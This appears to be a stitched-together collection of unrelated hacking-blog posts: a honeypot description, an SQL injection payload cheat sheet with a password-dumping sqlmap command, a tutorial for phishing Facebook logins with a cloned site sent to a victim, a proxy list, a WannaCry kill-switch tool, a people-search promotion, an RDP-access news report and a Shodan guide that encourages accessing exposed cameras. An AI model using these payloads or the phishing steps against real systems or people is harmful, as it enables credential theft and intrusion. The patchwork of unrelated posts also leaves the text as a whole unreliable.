Glastopf – Python web application honeypot

General approach:

  • Vulnerability type emulation instead of vulnerability emulation. Once a vulnerability type is emulated, Glastopf can handle unknown attacks of the same type. While implementation may be slower and more complicated, we remain ahead of the attackers until they come up with a new method or discover a new flaw in our implementation.
  • Modular design to add new logging capabilities or attack type handlers. Various database capabilities are already in place. HPFeeds logging is supported for centralized data collection.
  • Popular attack type emulation is already in place: Remote File Inclusion via a build-in PHP sandbox, Local File Inclusion providing files from a virtual file system and HTML injection via POST requests.
  • Adversaries usually use search engines and special crafted search requests to find their victims. In order to attract them, Glastopf provides those keywords (AKA “dork”) and additionally extracts them from requests, extending its attack surface automatically. As a result, the honeypot gets more and more attractive with each new attack attempted on it.
  • We will make the SQL injection emulator public, provide IP profiling for crawler recognition and intelligent dork selection.

HPFEEDS

The honeypot has hpfeeds, our central logging feature, enabled by default. If you don’t want to report your events, turn off hpfeeds in glastopf.cfg. By sending your data via hpfeeds you consent to sharing your data with third parties.

 

Web Application Honeypot http://glastopf.org

Union Based SQL Injection

[+] Union Based SQL Injection

‘ or 1=1#

1′ ORDER BY 10#

1′ UNION SELECT version(),2#

1′ UNION SELECT version(),database()#

1′ UNION SELECT version(),user()#

1′ UNION ALL SELECT table_name,2 from information_schema.tables#

1′ UNION ALL SELECT column_name,2 from information_schema.columns where table_name = “users”#

1’ UNION ALL SELECT concat(user,char(58),password),2 from users#

 

sqlmap –url=”<url>” -p username –user-agent=SQLMAP –threads=10 –eta –dbms=MySQL –os=Linux –banner –is-dba –users –passwords –current-user –dbs

How to hack facebook using kali linux : CREDENTIALS HARVESTER ATTACK

STEPS:

1. Boot up kali linux on your machine and open terminal.
2. Type this command in the kali linux terminal.
                    root@kali~# setoolkit
3. Enter ‘y’ to agree the social engineering toolkit terms and conditions.
4. Select the following options one by one from the menu
                ‘1’ (Social Engineering Attacks) then
                ‘2’(Website Attack Vectors) then
                ‘3’(Credential Harvester Attack) then
5. Type ‘2’ (Site cloner)
          set:webattack> IP address for the post back in harvesting:192.168.x.xxx (your ip address)
          set:webattack>Enter the url to clone: www.fb.com
6. Go to  Places > Computer > VAR > WWW and move all the files from www folder to html folder.
7.  Shorten your ip address with tinyurl.com and send it to the victim. When the victim open the link and enter the login details , you will get the username and password in a harvester text file which is located at Places > Computer > VAR > WWW.

110+ Free Proxy Sites – Free Proxy Servers

Many times, we face problems while accessing some websites. These problems arise due to the webpage not been available on the website / URL is blocked. However, you still need to access these sites from a place where it is blocked. So, the best method or solution here to access your useful websites is by using a proxy website. Proxy websites are designed to open many restricted websites which are blocked and places like colleges, government offices, schools, and other IP restricted areas.

Proxy sites therefore not only help you to access your blocked content but also help to surf the Internet anonymously. These sites are very easy and helpful to use. These sites simply redirect your entire traffic through the network by their service so that you can access the website directly. This is possible because when websites are blocked that servers are not blocked necessarily.
Hence today we have compiled a list of proxy websites which are helpful to you in many kinds of situations.

1.Skull Proxy 
This is the newest yet most powerful proxy server that you should use to access your desired site. The load time of the page is also quite low. This gives way for fast and easy access.

2.Hidester | Anonymous Free Web Proxy 

Many people use this proxy site for various reasons. Cool one of them is to avoid tracked by government multinational and even cybercriminals. This site can easily allow you to view your content from behind a Firewall or even unlock content at work.
It is absolutely safe and easy web proxy which will guarantee your privacy.

3. Hide My Ass VPN 

This is perhaps the most well-known proxy in the industry which is both available in the free and premium version.

4. Filterbypass.me – Best proxy server 

Of many proxy websites, available this is one of the best because of multiple advantages. It is an awesome website with completely free services. The homepage contains a URL box where we have to directly enter the URL we want to access. There are many more options such as enabling JavaScript and cookies can be allowed depending on our choices. The website is also clean with not too many ads or pop ups.

5. Proxysite.com 

This is again a very impressive proxy server which has an amazing site interface. It has really nice responsive UI similar to many professional websites. This website also provides with several service from different parts of the countries like US and Europe. So, if one of the proxy servers does not work for you then another will work surely. There are many more additional options to manage cookies and edit user agents too.

100+ Free Proxy Sites – Free Proxy Servers 

 

 

  1. Vtunnel – http://vtunnel.com/
  2. 4everproxy – http://4everproxy.com/
  3. Unblock My Web – http://www.unblockmyweb.com/
  4. YouTube Unblock Proxy – http://youtubeunblockproxy.com
  5. Working Proxy – http://workingproxy.net
  6. New Ip Now – http://newipnow.com/
  7. Proxy 2014 – http://proxy2014.net
  8. WebProxy.net – http://webproxy.net/
  9. Unblock YouTube Free – http://unblockyoutubefree.net
  10. Proxify – http://proxify.com/p/
  11. Ninja Clock – http://ninjacloak.com/
  12. Proxy.org – http://proxy.org/
  13. HideMyAss – https://www.hidemyass.com/proxy
  14. AnonyMizer – http://www.anonymizer.com/
  15. kProxy – http://www.kproxy.com/
  16. Zfreez – http://zendproxy.com/
  17. AnonyMouse – http://anonymouse.org/
  18. Free Open Proxy – http://freeopenproxy.com
  19. Vobas – http://www.vobas.com/
  20. Don’t Filter – http://www.dontfilter.us/
  21. BlewPass – http://www.blewpass.com/
  22. Unblock YouTube Beat School – http://unblockyoutubeatschool.com
  23. HideOnline Proxy – http://freeyoutube.net
  24. Hiding Your Info – http://hidingyour.info
  25. Free YouTube – http://freeyoutube.com
  26. Unblocker – http://unblocker.us
  27. Fast USA Proxy – http://fastusaproxy.com
  28. YouTube Free Proxy – http://youtubefreeproxy.net
  29. Proxyo – http://proxyo.info
  30. Quickproxy – http://quickproxy.co.uk
  31. Defilter – http://defilter.us
  32. Free Proxy Server – http://freeproxyserver.uk
  33. Free YouProxyTube – http://freeyouproxytube.com
  34. The Best Proxy – http://thebestproxy.info
  35. EXCS – http://ecxs.asia
  36. VPN Browse – http://vpnbrowse.com
  37. ProxyOne – https://proxyone.net
  38. Rapid Proxy – http://rapidproxy.us
  39. Web Proxy Free – http://webproxyfree.net
  40. Hide The Internet – http://hidetheinternet.com
  41. Greatest Free Proxy – http://greatestfreeproxy.com
  42. Just Proxy – http://justproxy.co.uk
  43. Singapore Proxy – http://singaporeproxy.nu
  44. Travel VPN – http://travelvpn.info
  45. Proxy-2014 – http://proxy-2016.com
  46. PRO Intern – http://prointern.info
  47. Host App – http://hostapp.eu
  48. Fun Proxy – https://funproxy.net
  49. Fast Time – http://fasttime.info
  50. Can’t Block This – http://cantblockthis.org
  51. Work Host – http://workhost.eu
  52. Proxy Call MeNames – http://proxmecallmenames.com
  53. Singapore Proxy – http://singaporeproxy.nu
  54. Travel VPN – http://travelvpn.info
  55. PRO Intern – http://prointern.info
  56. Host App – http://hostapp.eu
  57. Fun Proxy – https://funproxy.net
  58. Fast Time – http://fasttime.info
  59. Work Host – http://workhost.eu
  60. Proxy Call MeNames – http://proxmecallmenames.com
  61. Suede Proxy – http://suedeproxy.info
  62. To Proxy – http://toproxy.co
  63. US Proxy – http://usproxies.info
  64. Spedo – http://spedo.co
  65. PHProxy – http://phproxy.co
  66. London Proxy – http://londonproxy.eu
  67. Kr Proxy – http://krproxy.info
  68. America Proxy – http://americaproxy.info
  69. PK Proxy – http://pkproxy.info
  70. Brazil Proxy – http://brazilproxy.info
  71. Canada Proxy – http://canadaproxy.info
  72. CA Proxies – http://caproxies.info
  73. WebSurf Proxy – http://websurfproxy.me
  74. Proxy 2015 – http://proxy-2015.info
  75. FB Proxies – http://fbproxies.info
  76. US Proxy – http://usproxy.nu
  77. You Liaoren – http://youliaoren.com
  78. Proxy Internet – http://proxy-internet.info
  79. Fish Proxy – http://fishproxy.com
  80. Zacebook PK – http://zacebookpk.com
  81. Jezus Loves This Proxy – http://jezuslovesthisproxy.info
  82. German Proxy – http://german-proxy.info
  83. Proxys – http://proxys.pw
  84. Justun Block IT – http://justunblockit.com
  85. Proxy This – http://proxythis.info
  86. kProxy Site – http://kproxysite.com
  87. ViewTube – http://viewyoutube.net
  88. HideMyTraxProxy – https://hidemytraxproxy.ca/
  89. Proxay – http://www.proxay.co.uk
  90. Working Proxy – http://workingproxy.net
  91. F4FP – http://f4fp.com
  92. Sporium – http://sporium.org
  93. Saoudi Proxy – http://saoudiproxy.info
  94. Proxy Browse – http://proxybrowse.info
  95. Proxy 4 Freedom – http://proxy4freedom.com
  96. PRO Unblock – http://pro-unblock.com
  97. Star Doll Proxy – http://stardollproxy.com
  98. HideMyAss UK – http://hidemyass.co.uk
  99. DZ Hot – http://dzhot.us
  100. TiaFun- http://tiafun.com
  101. 1FreeProxy – http://1freeproxy.pw
  102. Network ByPass – http://networkbypass.com
  103. Me Hide – http://mehide.asia
  104. Go Proxy – http://goproxy.asia
  105. Zalmos – http://zalmos.com
  106. Intern Cloud – http://interncloud.info
  107. Xite Now – http://xitenow.com
  108. Surf For Free – http://surf-for-free.com
  109. Hidden Digital – http://hiddendigital.info

WannaSmile – A Simple Tool To Protect Yourself From WannaCry Ransomware

WannaCry Ransomware is spreading like wild fire. It uses vulnerability in Microsoft’s SMB ( which is turned on by default ).

On 13th may 2017 , security researcher going with the handle @malwaretech and Darien Huss found a ‘kill-switch’ which paused the ransomware. Basically the ransomware opens a unregistered domain and if fail to open then the system is infected. So @malwaretech registered the domain which stopped the ransomware.

Soon Cyber criminals around the world DDOSed it to take it down so that the ransomware can continue affecting.

Also the ‘kill-switch’ won’t work if :

  • System is not connected to internet
  • If the ‘kill-switch’ domain is down
  • If it is blocked by the isp or firewall

 

The Solution

Here is the link to the Repo : WannaSmile 

WannaSmile obtained the
100% Clean Softpedia Award

It can do the following :

  • It will disable SMB in your system ( which is enabled by default )
  • ( OnlineFix ) It will edit your host file and add google’s IP to the ‘kill-switch’ ( which means even if the site goes down you wont be affected )
  • ( OfflineFix ) It will create a lightweight local web server and add localhost to ‘Kill-switch’

 

Offline Fix For WannaCry

Runs a local server and localhost to the wannaCry kill-switch by appending hosts file. This is done so that when the ransomware tried to connect to the website it does not fail which will eventually stop the ransomware.

Instructions

1. Install the wannaSmile service by running the setup.exe from this release. (Download the wannasmile.zip file)

2. After Installing you need to start the service once and then it will do the rest automatically

To do that

  • Open start menu
  • Search services
  • Open the Services desktop app (a gear icon)
  • Inside Services search for WannaSmile (The list is alphabatical)
  • right click on WannaSmile and click start

The service will be running and the wanna cry IPs will be blocked along with the SMBs

WannaSmile – OnlineFix 

How To Run

You directly run the .exe file and it will do the magic. ( Run as Administrator ). If you don’t trust our .exe file then you yourself can compile and run it.

Tip

  •     Use the OnlineFix if you are always connected to the internet
  •     Use the OfflineFix if you are not connected to the internet.
Note : For a permanent fix, PLEASE UPDATE YOUR WINDOWS ASAP TO PATCH (MS17-010)

Best USA People Search Tool | Background Check

We really wanted to provide the BEST solution to our readers for this problem and we  did some extensive research and reverse engineering. After a loot of research and looking around we found the BEST solution of this problem for the people of tha USA Its the BEST USA people Search Tool. Its absolutely FREE to try and gives almost any information you want regarding the person for his / her background verification.

The name of the tool is EVERIFY.

find people for free usa | Find people by phone number

find people for free usa | Find people by phone number

The features of this tool include (but are not limited to) some of the best features you can think of :-

a) People Check – If you are looking for someone in the USA with any detail about the person. You can find the COMPLETE information about the person by looking for the person. In this tool you can :-

  • Search for person by Phone numbers
  • Search for person by Email addresses
  • Search for person by Address history
  • Search for person by DOB
  • Search for person by Relatives and associates

b) Social Media Check – Find all the information about any person from any social networking website including the complete list of his :-

  • Photos
  • Videos
  • Blogs
  • Professional interests
  • Social Networking Profiles
  • Archives and publications
  • And other!

c) Background Check – In case you get a spam email or even think of working with a legitimate person, doing a background check of the person is always a good idea. You can verify the complete information about the person based upon what he mentioned and what’s officially in the record by matching it against the following :-

  • Court Records
  • Marriage/Divorce Records
  • Birth Records
  • Death Records
  • Property Records
  • Asset Information

d) Criminal Check – If the above information was not enough, you can even go for the Criminal Record check of the person. The following information can be looked up about the person under criminal records :-

  • Arrest & convictions
  • Felonies & misdemeanor
  • Sex offenders
  • Mug shots
  • Criminal driving infractions
  • Court and probation records
  • And more

I have personally tested this tool and I loved it. I tried searching a person by phone number, name email and it automatically gave me all the related information about the person.

One think that could be improved about this tool is that currently its available only for the people of USA but we will find such valuable and useful resources for other countries as well and share the same for you guys to use.

I am sure many people will LOVE this tool and might start using it on regular basis. Some of our big corporate clients have been using this tool since long for the verification of the candidates they hire from the USA and save thousands of dollars annually in the actual verification. I myself use if for verification before we deal with any client overseas.

find people for free usa | Find people by phone number

find people for free usa | Find people by phone number

So next time you want to deal with any person from the USA and feel like doing their background checks, remember to use everify and get confident about your search before taking a step forward.

Hackers are selling backdoors into PCs for just $10

Cyber criminals are offering remote access to IT systems for just $10 via a dark web hacking store — potentially enabling attackers to steal information, disrupt systems, deploy ransomware and more.

The sales of backdoor access to compromised systems was uncovered by researchers at security company McAfee Labslooking into the sale of remote desktop protocol (RDP) access to hacked machines on underground forums — some of which are selling access to tens of thousands of compromised systems.

RDP access is a standard tool which allows one user to connect to and control another user’s computer over a network. The process is often used for support and administration, but in the wrong hands, RDP can be leveraged with devastating consequences — researchers point to how SamSam ransomware campaigns begin with RDP access as an example of this.

Leveraging RDP access also provides a bonus to the attacker because they don’t need to use tools like spear-phishing emails or exploit kits.

 

Systems advertised for sale on the forum range from Windows XP through to Windows 10, with access to Windows 2008 and 2012 Server most common. The store owners also offer tips for how those using the illicit logins can remain undetected.

Examining the IP addresses of compromised machines listed in one online store led researchers to discover that three belonged to a single international airport.

“This is definitely not something you want to discover on a Russian underground RDP shop,” said John Fokker, head of cyber investigations for McAfee Advanced Threat Research.

Further investigation found that two of the IP addresses were presented alongside a screenshot of a login screen which could be accessed via RDP with three user accounts tied to the system — one of which being the administrator account.

Perhaps most significantly, McAfee says the accounts are associated with two companies which provide airport security: one in camera surveillance, and one in security and building automation.

 

But with tens of thousands of RDP logins for sale, the airport wasn’t the only sensitive system found up for sale — researchers discovered criminals selling access to devices in government, hospitals and nursing homes.

All of those organisations which have been identified as having access to their systems up for sale have been informed and McAfee is working with them to uncover how machines were compromised.

In order to protect against this type of attack, researchers recommend the use of complex passwords and two-factor authentication, and disabling RDP connections over the internet. It’s also recommended that system administrators keep an eye out for suspicious IP addresses and unusual login attempts.

“Even a state-of-the-art solution cannot provide security when the backdoor is left open or carries only a simple padlock. Just as we check the doors and windows when we leave our homes, organizations must regularly check which services are accessible from the outside and how they are secured,” said Fokker.

Shodan a Search Engine for Hackers

Many people have described Shodan as a search engine for hackers, and have even called it “the world’s most dangerous search engine”. It was developed by John Matherly in 2009, and unlike other search engines, it looks for specific information that can be invaluable to hackers. John Matherly is an Inernet Cartographer, hence the shodan.

Shodan is a type of search engine that allows users to search for Internet-connected devices and explicit website information such as the type of software running on a particular system and local anonymous FTP servers. Shodan can be used much in the same way as Google, but indexes information based on banner content, which is meta-data that servers send back to hosting clients. For the best results, Shodan searches should be executed using a series of filters in a string format.

So in conclusion we can say that, Shodan is a search engine for finding specific devices, and device types, that exist online. It is like an internet map that lets us see which device is connected to which or ports are open on a specific device or what operating system a certain system is using, etc. Rather than to locate specific content on a particular search term, SHODAN is designed to help the user find specific nodes (desktops, servers, routers, switches, etc.) with specific content in their banners.

What Shodan can do?

Shodan pulls service banners from servers and devices on the web, mostly port 80, but also ports 21 (ftp), 22 (SSH), 23 (telnet), 161 (SNMP), and 5060 (SIP). Since almost every new device now has a web interface (maybe even your refrigerator) to ease remote management, we can access innumerable web-enabled servers, network devices, home security systems, etc. Shodan can find us webcams, traffic signals, video projectors, routers, home heating systems, and SCADA systems that, for instance, control nuclear power plants and electrical grids. If it has a web interface, Shodan can find it! Although many of these systems communicate over port 80 using HTTP, many use telnet or other protocols over other ports. Keep that in mind when trying to connect to them.

How to use Shodan?

Understanding shodan is very important at first you might find it complex but once yu get to know it you will find it very handy in use and  very resourcefull too. So, now let us learn how to work with fasinating search engine. To use shodan to your advantage you have

Follow the steps to register. After registration a link will be sent to your e-mail ID for your activation of account on Shodan. Once your account is activated login to Shodan and now that you are logged in you are free to search anything.

Here are some examples for which you can use shodan to search up the things you want.

Webcam

When you search for webcam, it will show you all the webcam present in the world. It will show the results as shown in the image below :

Traffic Signals

Searching about traffic signals or traffic signals camera then it will show you all the traffic surveillance camera present.

Cisco

Searching about cisco will show you all the cisco routers in the world but you can search them by country. Like, here, i have found cisco routers in India and result is below image :

Scada

You can also search about Scada and you will get its information around the whole world as shown :

netcam

Shodan can also show you about all the netcams in world and you can access them too with your hacking skills.

GPS

Shodan even lets you find all the GPS devices all over the world and for this you just have to type gps in the search box.

Port

Not only the devices but it can help find which port is open in which device. For example I have here searched port : 1723. Now we all know this port is used for VPN so through this we can know which device is using VPN as shown in image below :

When you search for port : 3389 it will show the operating system used by the device too which can be very useful.

This is how Shodan is useful for hackers as it gives all the information necessary to collect that too all over the world. And so you can manipulate this information as you desire.